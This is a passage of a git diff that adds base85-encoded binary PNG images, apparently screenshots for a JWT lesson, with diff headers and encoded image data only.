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

literal 0
HcmV?d00001

diff --git a/src/main/resources/lessons/jwt/images/challenge4-small.png b/src/main/resources/lessons/jwt/images/challenge4-small.png
new file mode 100644
index 0000000000000000000000000000000000000000..b9ddaa7e77c31d994c0b3d4c5bdbc98e52d719fa
GIT binary patch
literal 4433
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

literal 0
HcmV?d00001

diff --git a/src/main/resources/lessons/jwt/images/challenge5-small.png b/src/main/resources/lessons/jwt/images/challenge5-small.png
new file mode 100644
index 0000000000000000000000000000000000000000..1aa84ab4c05f15712d1d6471d14f01048ebcf395
GIT binary patch
literal 17065
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
